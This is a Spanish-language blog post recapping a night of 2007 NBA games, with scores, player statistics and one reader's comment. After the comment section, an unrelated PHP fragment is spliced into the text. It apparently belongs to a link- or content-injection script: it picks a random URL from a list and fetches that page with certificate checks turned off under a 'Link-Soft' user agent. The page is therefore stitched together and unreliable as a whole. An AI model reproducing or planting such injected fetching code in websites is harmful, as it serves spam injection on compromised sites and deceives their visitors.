La crónica (14/11/07)

15 de November de 2007 por Queco

Noche de muchos partidos y muchas noticias. Después de su larga lesión, Wade regresó a las canchas, pero no pudo evitar una nueva derrota de los Heat, que no levantan cabeza en este comienzo de temporada. La derrota duele más teniedo en cuenta que fue ante los Sonics, que hasta anoche tenían su casillero de victorias a cero. De esta forma, Golden State se queda como el único equipo que no conoce la victoria, tras desperdiciar 22 puntos de ventaja ante los Pistons. Por lo demás, Boston sigue suma y sigue, Lakers ganó en cancha de los Rockets, que no pudo superar la lesión de T-Mac, Howard le ganó el pulso a Lebron y ninguno de los españoles pudo hacerse con la victoria.

Magic 117 – 116 Cavaliers

Emocionante partido que se decidió en los minutos finales, a pesar de que Orlando empezó el partido con una ventaja de 13 puntos en los primeros minutos. Los Cavs se repusieron y de la mano de un excepcional Lebron James (39 puntos 13 rebotes y 14 asistencias) a punto estuvieron de llevarse la victoria. Lo evitó Turkoglu, que en la jugada final logró evitar la canasta del propio Lebron, forzando un salto entre dos. Antes, dos tiros libres de Howard (35 puntos y 16 rebotes) habían puesto por delante a los de Orlando.

Hawks 117 – 109 Bobcats

Tranquila victoria de los Hawks ante unos Bobcats que nunca inquietaron demasiado. Pronto alcanzarían los de Atlanta una buena ventaja (22-37 en el primer cuarto), que sólo en el tercer cuarto se vio reducida por los hombres de Charlotte. A destacar por los Hawks la actuación de Joe Johnson, con 34 puntos y los 23 de Childress desde el banquillo. Tanto Josh Smith como Acie Law se tuvieron que retirar para no volver en el tercer cuarto, con lesiones de las que hoy se conocerá la gravedad.

Wizards 103 – 90 Indiana

Partido sin mucha historia en Washington, donde los Wizards por fin consiguen ganar tras 10 derrotas consecutivas. Destaca el buen partido de Gilbert Arenas, que parecía no estar en este principio de temporada, pero que ayer volvió por sus fueros con 30 puntos y 11 asistencias, en una serie de 9-18 en el tiro. Indiana sigue su caída, tras un buen inicio, que parece fue un espejismo.

Jazz 92 – 88 Raptors

Partido ganado por los Jazz, que sin hacer un juego espectacular ganaron sin excesivos problemas a unos Raptors que no saben a que juegan. La tripleta Williams (22 puntos y 5 asistencias), Boozer (23 puntos y 14 rebotes), Kirilenko (8 puntos, 9 rebotes y 11 asistencias) impuso su ley. Los de Sam Mitchell, francamente desafortunado tanto en el planteamiento como en el desarrollo del partido, fueron totalmente a remolque, incapaces de hacer un juego fluido. La inexistencia de juego interior, con un Chris Bosh totalmente desaparecido hasta los instantes finales, lastró en exceso el ataque canadiense. Tan sólo Anthony Parker con 19 puntos y Kris Humphries con 14 rebotes, 5 de ellos en ataque, representaron alguna amenaza. Mención aparte merece Andrea Bargnani. El pivot de Toronto, que no salió en el quinteto titular dejando su puesto a Jamario Moon, tuvo un partido desastroso, sin tocar la pintura, y con unos porcentajes de tiro nefastos, 1 de 11. La participación española fue bastante escasa, ya que Calderón aportó poco, aunque dirigió bien al equipo en los 15 minutos que estuvo en cancha, y Garbajosa no jugó, apartado de la rotación por Sam Mitchell por alguna razón desconocida.

Nets 69 – 91 Celtics

Tras un primer cuarto en el que los Nets parecía podrían plantar cara a estos imbatibles Celtics, en el segundo los verdes demostraron que también saben defender, dejando a los de New Jersey en sólo 11 puntos, y se fueron al descanso por delante. A partir de ahí, la ventaja no hizo más que aumentar y es que seis jugadores de los Celtics superaron los 10 puntos, mientras que por los Nets solo lo hicieron 3. Tercer partido consecutivo perdido para los Nets, y séptimo ganado, sin ninguna derrota, para unos Boston Celtics que por fin, tras “unha longa noite de pedra”, que diría el poeta gallego Celso Emilio Ferreiro, parecen ver la luz del día.

Supersonics 104 – 95 Miami

Volvía Wade, y volvía ante unos Supersonics que llevaban 8 derrotas consecutivas, así que la ocasión parecía propicia para que Miami sumase su segunda victoria de la temporada, y de una vez, empezase a remontar el vuelo. Wade fue el mejor de su equipo, pero eso no fue suficiente. Los Sonics, de la mano de Wilcox con 20 puntos y 10 rebotes, Wilkins con 19 puntos y el rookie Durant que anotó 18 aunque con malos porcentajes, dejaron a Miami con un triste récord de 1 victoria y 7 derrotas, aunque eso sí, ha vuelto Flash.

Grizzlies 99 – 102 Bucks

Partido intenso y extraño el jugado en la cancha de Milwaukee, con un tiro decisivo por parte de Desmond Mason a falta de 13 segundos y un par de tiros libres de Mo Williams que ponían a los Bucks 4 arriba faltando 7 segundos. Con 2 segundos por jugar, Bogut cometió falta sobre Mike Miller, que anotó el primero, fallando el segundo cuyo rebote fue capturado por Gasol que se jugó el triple desde la esquina pero falló. Antes de eso, Michael Redd destrozó la pobre defensa de Memphis anotando 31 puntos con 5 de 7 en triples. Junto a él, destacar la gran actuación de Bogut con 23 puntos y 12 rebotes, Mo Williams con 12 asistencias y Yo JianLian que capturó otros 13 rebotes. Por el contrario, en Memphis hay que destacar aspectos más negativos. Por un lado el pobre porcentaje de tiros triples, 33%, en especial por parte de Mike Miller, que hizo un 1 de 7. Buen partido en la faceta anotadora de Rudy Gay con 26 puntos, pero negativo en el aspecto colectivo. El juego rápido de Memphis no es precisamente el que más le conviene a Gasol, y en muchas ocasiones, la jugada de ataque ya se ha decidido cuando él está llegando a la línea de 3 del equipo rival. A Mark Iavaroni le queda mucho trabajo que hacer, en especial en el aspecto de la organización y tipo de ataque que quiere, teniendo en cuenta de los jugadores que posee.

Sixers 76 – 95 Hornets

Los Hornets igualan su mejor marca de inicio con esta victoria, y se ponen 7-2. Mientras los Sixers siguen su caída, tercera derrota consecutiva y se quedan con 2-6. Los de Philadelphia plantaron cara durante la primera mitad, y se llegó al descanso con empate en el marcador. Pero en la segunda mitad, los Hornets subieron el ritmo y Philadelphia no pudo seguirles. Morris Peterson anotó 27 puntos, con un excelente 6-9 en triples, y Tyson Chandler y Chris Paul compartieron doble-doble, 14 puntos 10 rebotes para el pívot, y 13 puntos 10 asistencias para el base. Los Hornets han ganado los tres partidos en que se ha dado esta circunstancia.

Kings 103 – 108 Wolves

Duelo por todo lo bajo en Minnesotta. Los Kings llegaban con sólo dos victorias y 5 derrotas, mientras que los Timberwolves aún no conocían la victoria en 5 partidos, y por fin, consiguieron llevarse el gato al agua. Destaca el gran partido de Rashard McCants, que parece ha olvidado definitivamente sus problemas de lesiones, e hizo 33 puntos con una serie de 13 de 22 en tiros de campo. Ayudado por Al Jefferson, con 23 puntos y 7 rebotes, y por Antoine Walker con 19 puntos, ante unos Kings que nunca se dieron por vencidos, liderados en la anotación por Kevin Martin con 22, y un gran partido de Udrih, con 17 puntos 4 rebotes y 5 asistencias. La vuelta de Artest, que hizo 17 puntos, no fue suficiente para unos Kings que nada tienen que ver con aquellos que maravillaban con su juego.

Lakers 93 – 90 Houston

Victoria de los Lakers en Houston, en un partido que se presentaba, como siempre que se enfrentan, como un duelo Kobe-McGrady. Pero esta vez no pudo ser, porque la estrella de los Rockets, tuvo que retirarse poco antes del descanso con una lesión en el codo. Los Lakers llegaron al descanso con una buena ventaja, que dilapidaron rápidamente con 5 pérdidas en 8 minutos, y los Rockets dejaron el marcador en 69-68. Kobe empezó el último cuarto en el banquillo, los Lakers mantuvieron una ligera ventaja, pero Houston apretaba, especialmente con un Bonzi Wells que con T-Mac en el hospital y Yao bien defendido, tomó las riendas de su equipo con 8 puntos consecutivos en el último cuarto. Tras varios altibajos en el marcador, los Lakers lograron imponerse, a pesar de un último intento de Alston por empatar el partido con un triple. Bryant finalizó el partido con 30 puntos, como hombre mas destacado por parte laker, mientras Yao Ming hizo 26, con un pobre 6-18 en tiros, que fue incluso peor que el de todo el equipo 30-85, solo un 35%.

Blazers 93 – 110 Nuggets

Poco hay que contar en este partido. Los Blazers lo ganan todo en casa, pero lo pierden todo fuera. Si a eso sumamos que venían de jugar el día anterior, y estaban cansados, es cosa hecha. Poco a poco, los de Denver se fueron escapando en el marcador, sin excesiva dificultad. Destaca por los Blazers los 15 puntos y 9 rebotes de Aldridge, y los 15 minutos que jugó Sergio, dos puntos, con 1 de 5 en tiros, 1 asistencia, 2 robos y una pérdida. Por los Nuggets 20 de Iverson y 25 de Carmelo, además de los 13 rebotes y 5 tapones de Camby.

Knicks 81- 83 Clippers

Nueva derrota de los Knicks, que además, se quedaron en sólo 9 puntos en el tercer cuarto. Volvió Marbury, no se sabe si por los 180.000 dólares de multa o porque se aburría en casa, pero parece que las diferencias con Isiah no eran tan insalvables, ya que jugó 34 minutos, saliendo del banquillo, eso sí. Destacan las actuaciones de Randolph 16 puntos y 19 rebotes, Curry con 16 y 12, y Kaman con 14 y 18, aunque visto que ninguno de los dos equipos pasó del 36% de acierto en tiros, tampoco extraña esta exhibición reboteadora.

Pistons 111 – 104 Warriors

Se enfrentaban los dos equipos que probablemente menos usan las rotaciones en la liga, y ayer no fue la excepción, ni mucho menos. Por parte de los Pistons el sexto hombre jugó 12 minutos, y cuatro hombres más entraron en la rotación, llegando sólo uno a los 10 minutos. Por los Warriors Ellis salió del banquillo para jugar 25 minutos, pero los otros tres hombres de banquillo, ninguno llego a 6 minutos. Así que, fue una lucha de quintetos. Salieron los Warriors de manera fulgurante, anotando 40 puntos en el primer cuarto, y se pusieron 15 arriba. Pero poco a poco Detroit fue imponiendo su rodillo, punto a punto, granito a granito, fueron no sólo enjugando la ventaja, sino cogiéndola ellos. No jugó Billups, pero Prince, Rasheed y Hamilton anotaron 22 cada uno, más los 14 y 14 rebotes de Maxiell, para que no se notase mucho su baja. Por los Warriors, 29 y 10 asistencias de Baron Davis, con 20 de Harrington y 18 y 11 rebotes de Biedrins.

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    Ya esta bien de manipulacion, habra que empezar a rodar cabezas, el otro dia fuera de los pronosticos y hoy nos quitan un punto por la cara, metimos 84 puntos ¡¡¡¡

    Ya esta bien de manipulacion amarilla¡¡¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>